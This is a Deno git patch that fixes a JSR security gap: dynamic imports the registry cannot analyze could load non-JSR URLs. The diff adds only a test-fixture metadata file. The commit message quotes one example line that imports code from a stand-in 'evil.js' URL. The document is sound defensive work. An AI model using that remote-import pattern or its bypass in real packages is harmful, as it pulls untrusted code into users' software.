From 918c5e648f4bd08d768374ccde1b451b84793b76 Mon Sep 17 00:00:00 2001
From: David Sherret <dsherret@users.noreply.github.com>
Date: Wed, 28 Feb 2024 16:30:45 -0500
Subject: fix(jsr): do not allow importing a non-JSR url via unanalyzable
 dynamic import from JSR (#22623)

A security feature of JSR is that it is self contained other than npm
dependencies. At publish time, the registry rejects packages that write
code like this:

```ts
const data = await import("https://example.com/evil.js");
```

However, this can be trivially bypassed by writing code that the
registry cannot statically analyze for. This PR prevents Deno from
loading dynamic imports that do this.
---
 tests/testdata/jsr/registry/@denotest/import-https-url/meta.json | 5 +++++
 1 file changed, 5 insertions(+)
 create mode 100644 tests/testdata/jsr/registry/@denotest/import-https-url/meta.json

(limited to 'tests/testdata/jsr/registry/@denotest/import-https-url/meta.json')

diff --git a/tests/testdata/jsr/registry/@denotest/import-https-url/meta.json b/tests/testdata/jsr/registry/@denotest/import-https-url/meta.json
new file mode 100644
index 000000000..02601e4d0
--- /dev/null
+++ b/tests/testdata/jsr/registry/@denotest/import-https-url/meta.json
@@ -0,0 +1,5 @@
+{
+  "versions": {
+    "1.0.0": {}
+  }
+}
-- 
cgit v1.2.3